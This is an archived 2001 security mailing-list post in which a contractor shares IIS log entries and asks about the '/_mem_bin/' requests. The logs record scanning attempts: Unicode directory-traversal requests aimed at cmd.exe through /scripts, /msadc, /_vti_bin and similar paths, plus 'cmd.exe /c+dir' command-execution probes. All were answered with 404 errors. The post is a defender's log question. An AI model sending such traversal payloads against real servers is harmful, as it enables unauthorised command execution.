Found this in my logs

From: Hamid T Ouyachchi (btihtoat_private)
Date: Mon Apr 30 2001 - 11:05:41 PDT

Next message: Joakim von Braun: "Re: Port 1981 UDP trojan/worm?"

Previous message: Benjamin Krueger: "Re: Mysterious message"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello all,

Found this in my IIS logs. I recognize the Unicode exploit attempts, frontpage
msdacs stuff. But what is the /mem-bin/ entry about ?

Hamid Ouyachi
Contractor
Office of Workforce Security
Phone: (202)219-5935 x302


2001-04-20 04:41:21 211.61.250.248 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3 604 199 0 80 HTTP/1.0 TeamSoft+WinInet+Component - -
2001-04-20 13:44:13 195.6.99.109 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3 623 177 0 80 HTTP/1.1 TeamSoft+WinInet+Component - -
2001-04-26 12:23:17 195.219.50.243 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3 604 199 0 80 HTTP/1.0 TeamSoft+WinInet+Component - -
2001-04-26 22:21:53 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 66 0 80 HTTP/1.0 - - -
2001-04-26 22:21:53 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 86 0 80 HTTP/1.0 - - -
2001-04-26 22:21:53 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0 - - -
2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0 - - -
2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 100 0 80 HTTP/1.0 - - -
2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 99 0 80 HTTP/1.0 - - -
2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 99 0 80 HTTP/1.0 - - -
2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 100 0 80 HTTP/1.0 - - -
2001-04-28 08:30:47 202.111.82.199 - W3SVC3 [ ]   GET /_mem_bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:49 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:50 202.111.82.199 - W3SVC3 [ ]   GET /_mem_bin/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:52 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:53 202.111.82.199 - W3SVC3 [ ]   GET /_vti_bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:54 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:56 202.111.82.199 - W3SVC3 [ ]   GET /_vti_bin/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 78 16 80 HTTP/1.0 - - -
2001-04-28 08:30:57 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:58 202.111.82.199 - W3SVC3 [ ]   GET /cgi-bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
2001-04-28 08:31:00 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
2001-04-28 08:31:01 202.111.82.199 - W3SVC3 [ ]   GET /cgi-bin/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
2001-04-28 08:31:02 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
2001-04-28 08:31:04 202.111.82.199 - W3SVC3 [ ]   GET /msadc/..À/..À/winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
2001-04-28 08:31:05 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
2001-04-28 08:31:08 202.111.82.199 - W3SVC3 [ ]   GET /msadc/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
2001-04-28 08:31:10 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
2001-04-28 08:31:12 202.111.82.199 - W3SVC3 [ ]   GET /scripts/..À/..À/..À/winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
2001-04-28 08:31:13 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
2001-04-28 08:31:14 202.111.82.199 - W3SVC3 [ ]   GET /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
2001-04-28 08:31:16 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
2001-04-28 08:31:17 202.111.82.199 - W3SVC3 [ ]   GET /scripts/ccc.exe - 404 3 604 35 0 80 HTTP/1.0 - - -
2001-04-28 08:31:19 202.111.82.199 - W3SVC3 [ ]   GET /scripts/cmd.exe - 404 3 604 35 0 80 HTTP/1.0 - - -
2001-04-28 08:31:20 202.111.82.199 - W3SVC3 [ ]   GET /_vti_cnf/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:31:21 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:31:23 202.111.82.199 - W3SVC3 [ ]   GET /_vti_cnf/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -

Next message: Joakim von Braun: "Re: Port 1981 UDP trojan/worm?"
Previous message: Benjamin Krueger: "Re: Mysterious message"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 01 2001 - 03:40:36 PDT